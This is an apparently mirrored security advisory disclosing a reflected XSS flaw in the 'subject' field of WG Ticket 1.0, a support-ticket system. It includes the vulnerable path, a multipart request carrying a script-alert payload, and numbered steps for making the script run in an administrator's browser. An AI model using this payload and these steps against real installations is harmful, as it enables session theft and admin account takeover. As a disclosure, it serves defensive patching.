WG Ticket 1.0 Cross Site Scripting

🗓️ 19 Jun 2023 00:00:00Reported by CraCkErType
packetstorm🔗 packetstormsecurity.com👁 246 Views
WG Ticket 1.0 XSS, Impact: site content manipulation, vulnerability in 'subject' parameter, admin panel vulnerabilit
`┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││ C r a C k E r ┌┘  
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ [ Vulnerability ] ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: Author : CraCkEr :  
│ Website : https://www.codester.com/items/40101/ │  
│ Vendor : KreativDev │  
│ Software : WG Ticket 1.0 - Ticket and Support System │  
│ Vuln Type: Reflected XSS │  
│ Impact : Manipulate the content of the site │  
│ │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: :  
│ Release Notes: │  
│ ═════════════ │  
│ The attacker can send to victim a link containing a malicious URL in an email or │  
│ instant message can perform a wide variety of actions, such as stealing the victim's │  
│ session token or login credentials │  
│ │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
Greets:  
  
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09   
  
CryptoJob (Twitter) twitter.com/0x0CryptoJob  
  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ © CraCkEr 2023 ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
  
Path: /add-ticket-post  
  
POST parameter 'subject' is vulnerable to RXSS  
  
-----------------------------271612615641839361601287503567  
Content-Disposition: form-data; name="subject"  
  
lulze1cbq<script>alert(1)</script>nzxns  
-----------------------------2716126156418393616012875  
  
1. Sign UP & Login in any Normal User  
2. Click on +Open New Request  
3. In Subject Put Your XSS Payload  
4. Submit  
5. XSS Fired on User Browser  
  
6. When the Admin Visit the Ticket page From Admin Panel on this Path https://website/admin-tickets  
7. The XSS Will Fire on his browser  
  
  
[-] Done  
`
19 Jun 2023 00:00Current
7.1High risk
Vulners AI Score7.1